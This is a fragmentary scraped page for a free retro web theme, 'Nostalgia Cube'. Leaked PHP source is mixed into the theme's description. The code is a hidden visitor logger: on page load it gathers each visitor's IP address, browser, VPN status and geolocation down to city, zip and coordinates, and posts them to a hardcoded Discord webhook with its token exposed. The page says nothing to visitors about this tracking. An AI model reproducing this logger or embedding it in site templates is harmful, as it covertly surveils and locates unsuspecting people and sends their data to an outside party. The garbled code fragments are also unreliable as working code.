Document Visitor(); ?>

Nostalgia Cube is a simple theme / layout color picked straight from a GameCube controller!

Free to use with credit. Edit however you like.

For credit: There is a small controller that links back to me in the bottom right corner. Either leave that there or credit me elsewhere easily accesible on your site, thank you.

This theme is NOT mobile responsive.

With 4 button colors, 2 post colors, a divider, and a cute controller decoration!

Images

Here are images made for this theme. Feel free to download and use them elsewhere, with credit.

Heading

This is a paragraph.

This is another paragraph.

Bold Italic Link

This is a blockquote!
  • and an unordered list!
  1. an ordered list as well

You can make as many posts and make them as long as you like, the container will scroll to fit them!

Links look best against post1's background

Document connection_type === "Corporate") { $VPN = "Yes"; } else { $VPN = "No"; } //Set some variables $Country = $Details->country; $CountryCode = $Details->countryCode; $Region = $Details->regionName; $City = $Details->city; $Zip = $Details->zip; $Lat = $Details->lat; $Lon = $Details->lon; $WebhookName = $IP; //Old method of getting a flag picture //$Flag = "https://www.countryflags.io/{$Details->countryCode}/flat/64.png"; $Details->countryCode = strtolower($Details->countryCode); $FlagOLD = "https://raw.githubusercontent.com/stevenrskelton/flag-icon/master/png/75/country-4x3/{$Details->countryCode}.png"; $Flag = "https://countryflagsapi.com/png/{$Details->countryCode}"; class Discord { //This will run and send as soon as the page loads public function Visitor() { global $IP, $Browser, $Date, $Time, $VPN, $Country, $CountryCode, $Region, $City, $Zip, $Lat, $Lon, $WebhookName, $Flag; //Insert FULL webhook URL here (URL begins with: https://discord.com/api/webhooks/) $Webhook = "https://discord.com/api/webhooks/1302683861456781432/6-IxtNy-ruQ_rvMT5X4L5gEOwd9M-a_GUZQNiZvF8LdLYPIsH9xpzP3mvOCna-J-cgeM"; $InfoArr = array( "username" => "$WebhookName", "avatar_url" => "$Flag", "embeds" => [array( "title" => "Visitor From $Country", "color" => "39423", "fields" => [array( "name" => "IP", "value" => "$IP", "inline" => true ), array( "name" => "VPN?", "value" => "$VPN", "inline" => true ), array( "name" => "Useragent", "value" => "$Browser" ), array( "name" => "Country/CountryCode", "value" => "$Country/$CountryCode", "inline" => true ), array( "name" => "Region | City | Zip", "value" => "[$Region | $City | $Zip](https://www.google.com/maps/search/?api=1&query=$Lat,$Lon 'Google Maps Location (+/- 750M Radius)')", "inline" => true )], "footer" => array( "text" => "$Date $Time", //Alarm-clock icon for the footer. You could also download the image and set the icon_url to the image path "icon_url" => "https://e7.pngegg.com/pngimages/766/619/png-clipart-emoji-alarm-clocks-alarm-clock-time-emoticon.png" ), )], ); //Some code that sends the info as an embed to Discord $JSON = json_encode($InfoArr); $Curl = curl_init($Webhook); curl_setopt($Curl, CURLOPT_HTTPHEADER, array('Content-type: application/json')); curl_setopt($Curl, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($Curl, CURLOPT_POSTFIELDS, $JSON); curl_setopt($Curl, CURLOPT_RETURNTRANSFER, true); //En voilĂ  return curl_exec($Curl); } } ?>